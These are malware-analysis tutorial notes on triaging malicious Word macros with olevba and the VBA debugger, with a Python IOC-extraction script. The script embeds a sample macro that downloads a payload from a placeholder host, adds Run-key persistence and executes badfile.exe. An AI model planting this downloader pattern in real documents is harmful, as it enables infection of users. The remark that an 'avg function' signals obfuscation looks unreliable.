Analyzing Macro Code in Office Documents

Tools Used:

  1. Oletools (OLEVBA): A Python-based suite of tools used to analyze and extract VBA source code from Office documents.

  2. Microsoft Word: Used to debug macro code through the VBA Developer Tools.

Steps for Analyzing Macro-Enabled Documents:

  1. Initial Setup:

    • Revert the VM snapshot, copy the course files, and start FakeNet so that any network requests the macro makes are captured locally instead of reaching the internet.

    • Open the command prompt in the folder where the sample document is located.

  2. Static Analysis with OLEVBA:

    • Execute the command olevba re_test_dlx.doc to analyze the document.

    • OLEVBA provides a summary of the analysis, including potential trigger points such as Auto_Open and Document_Open.

    • Redirect the output to a text file for easier navigation: olevba re_test_dlx.doc > olevba_result.txt.

    • Key Points to Analyze:

      • Focus on trigger points like Auto_Open and Document_Open.

      • Inspect the code for functions like MsgBox (displays a message), internet connections, registry modifications, and file executions.

  3. Understanding the Macro Code:

    • Analyze the flow of the macro:

      • The macro might display a message, connect to the internet, create a registry entry, and finally execute a file.

    • Pay attention to the usage of functions like RegWrite (registry modification) and Shell (command execution).

    • Look for obfuscation techniques, such as the use of the avg function, which may indicate encrypted or encoded strings that the macro decodes at run time.

  4. Dynamic Analysis with Microsoft Word:

    • Open the document in Microsoft Word (e.g., Word 2013).

    • Setting Breakpoints:

      • Use Alt + F11 to open the VBA Developer Window.

      • Navigate to the Document_Open subroutine and insert an End statement at its start so the macro stops before doing anything once macros are enabled.

      • Set a breakpoint at the first line of the subroutine.

    • Debugging:

      • Enable macro content in the Word document to trigger execution.

      • Return to the VBA editor and step through the code using F8.

      • Use Shift + F8 (Step Over) to skip decryption routines you do not need to trace line by line, but make sure you still understand the decryption algorithm.

      • Use the Watch Window to monitor variables and expressions, especially to observe decrypted text or key indicators of compromise (IOCs).

  5. Key Observations:

    • Identify network activity, such as GET requests and the corresponding URLs.

    • Detect the creation of persistent mechanisms (e.g., writing to the registry).

    • Observe any execution of downloaded or created files, such as badfile.exe.
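The static triage in steps 2 and 3 and the IOC collection in step 5 can be done with a script over the VBA source that olevba prints, before opening the document in Word. The following is an added example written for these notes; it is not part of the course material or of oletools. The macro text inside it is a constructed sample, not the macro from re_test_dlx.doc, and the hostname, registry path and file path in it are made up. It flags the automatic entry points, counts suspicious calls such as MsgBox, RegWrite and Shell, and joins string literals that the author split with & so that a URL hidden as "http://" & "example.invalid" is still recovered.

```python
"""Static triage of VBA source as dumped by olevba (added example, not course code)."""
import json
import re
import sys

# Constructed sample macro, written for this example only. It is NOT the macro
# from re_test_dlx.doc; the host, registry key and file path are invented.
SAMPLE_VBA = r'''
Private Sub Document_Open()
    MsgBox "Loading document, please wait..."
    Dim u As String
    u = "http://" & "example.invalid" & "/stage/payload.bin"
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", u, False
    http.Send
    Set sh = CreateObject("WScript.Shell")
    sh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater", _
                "C:\Users\Public\badfile.exe", "REG_SZ"
    Shell "C:\Users\Public\badfile.exe", vbHide
End Sub
'''

# Subroutine names that Office runs automatically when the document is opened or closed.
TRIGGERS = ("Auto_Open", "AutoOpen", "Document_Open", "AutoExec", "Workbook_Open", "AutoClose")

# Calls worth a closer look during static review, and the behaviour each implies.
SUSPICIOUS = {
    "MsgBox": "displays a message",
    "CreateObject": "instantiates a COM object (WScript.Shell, XMLHTTP, ...)",
    "XMLHTTP": "HTTP client, usually a download",
    "RegWrite": "writes to the registry (persistence)",
    "Shell": "executes a command or file",
    "Chr": "builds strings from character codes (common in decoders)",
    "Asc": "reads character codes (common in decoders)",
}

URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)
REG_RE = re.compile(r'HK(?:CU|LM|CR|U|CC)\\[^"\s]+', re.IGNORECASE)
FILE_RE = re.compile(r'[\w.-]+\.(?:exe|dll|scr|bat|cmd|vbs|js|ps1)\b', re.IGNORECASE)


def join_split_strings(vba: str) -> str:
    """Collapse "abc" & "def" (also across a _ line continuation) into "abcdef".

    Splitting literals is a cheap way to hide URLs from a grep; undoing it first
    is what lets the IOC regexes below see the whole string.
    """
    return re.sub(r'"\s*&\s*_?\s*"', "", vba)


def find_triggers(vba: str) -> list[str]:
    """Return the auto-executing Sub names defined in the source, in order."""
    wanted = {t.lower() for t in TRIGGERS}
    subs = re.finditer(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)", vba, re.IGNORECASE | re.MULTILINE)
    return [m.group(1) for m in subs if m.group(1).lower() in wanted]


def find_suspicious(vba: str) -> dict[str, int]:
    """Count occurrences of each suspicious call; VBA identifiers are case-insensitive."""
    counts = {}
    for name in SUSPICIOUS:
        hits = re.findall(rf"\b{name}\b", vba, re.IGNORECASE)
        if hits:
            counts[name] = len(hits)
    return counts


def extract_iocs(vba: str) -> dict[str, list[str]]:
    """Pull URLs, registry keys and executable file names out of the joined source."""
    joined = join_split_strings(vba)
    return {
        "urls": sorted(set(URL_RE.findall(joined))),
        "registry": sorted(set(REG_RE.findall(joined))),
        "files": sorted({f.lower() for f in FILE_RE.findall(joined)}),
    }


def triage(vba: str) -> dict:
    """Summary of what runs automatically, what it calls, and what to watch for in Word."""
    return {
        "triggers": find_triggers(vba),
        "suspicious": {k: f"{v} x {SUSPICIOUS[k]}" for k, v in find_suspicious(vba).items()},
        "iocs": extract_iocs(vba),
    }


if __name__ == "__main__":
    # Usage: python triage_vba.py olevba_code.txt   (no argument runs the built-in sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    else:
        source = SAMPLE_VBA
    print(json.dumps(triage(source), indent=2))
```

Feed it the macro source only (olevba -c prints the code without its own analysis table); if you pass the full olevba_result.txt, olevba's summary lines will be counted as hits too. The triggers and registry and URL strings it reports are the places to set breakpoints and Watch Window expressions in step 4, and the decrypted values you see there can be compared against what the static pass could and could not recover.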

Summary:

  • OLEVBA is used for static analysis, helping to identify key functions and trigger points within the macro code.

  • Microsoft Word's VBA Editor is essential for dynamic analysis, allowing step-by-step debugging to understand the macro's behavior fully.

  • Key techniques include setting breakpoints, skipping unnecessary decryption steps, and using the Watch Window to monitor variables and expressions.

These notes cover the fundamental steps and observations when analyzing macro-enabled Word documents for potential malicious activity.
